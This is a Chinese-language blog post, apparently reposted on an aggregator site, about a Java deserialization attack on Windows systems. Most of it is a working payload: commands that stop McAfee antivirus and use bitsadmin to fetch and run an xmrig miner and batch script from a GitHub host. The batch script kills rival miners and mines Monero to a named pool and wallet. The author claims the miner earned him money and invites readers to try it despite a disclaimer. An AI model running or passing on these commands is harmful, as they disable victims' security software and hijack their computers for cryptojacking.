最近，安全社區(qū)中有很多人都在討論如何利用Java反序列化漏洞來攻擊類似Apache、SOLR和WebLogic之類的系統(tǒng)。不說廢話，我們直接進入正題。目前絕大多數(shù)的此類攻擊針對的都是Linux/Unix系統(tǒng)，但是我近期發(fā)現(xiàn)了一種針對Windows系統(tǒng)的攻擊方法。

PS：本文僅用于技術(shù)討論與分享，嚴禁用于非法用途

攻擊代碼如下：

cmd/cnet stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

實際的Payload分析

關(guān)閉McAfee反病毒軟件（我不明白社區(qū)中的這種技術(shù)為啥只關(guān)掉McAfee…）：

netstop "McAfee McShield;netstop mcafeeframework;

使用bitsadmin從GitHub下載加密貨幣挖礦程序和一個batch腳本文件：

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch腳本文件代碼如下：

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o http://monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

首先，上述代碼會終止其他xmrig進程（可能是為了防止資源競爭）。接下來，它會關(guān)閉McAfee。然后便會開啟挖礦程序，并跟http://monerohash.com礦池（端口3333）進行連接。它只會占用大約50%的CPU資源，估計是為了避免被檢測到吧。

目前為止，這個挖礦程序的計算能力只能實現(xiàn)350哈希每秒，并為我挖到了40個門羅幣（價值約為7000美元）。

感興趣的同學(xué)可以自己動手試一試，說不定會有一些意想不到的收獲。

總結(jié)

以上是生活随笔為你收集整理的利用Java反序列化漏洞在Windows上的挖矿实验的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。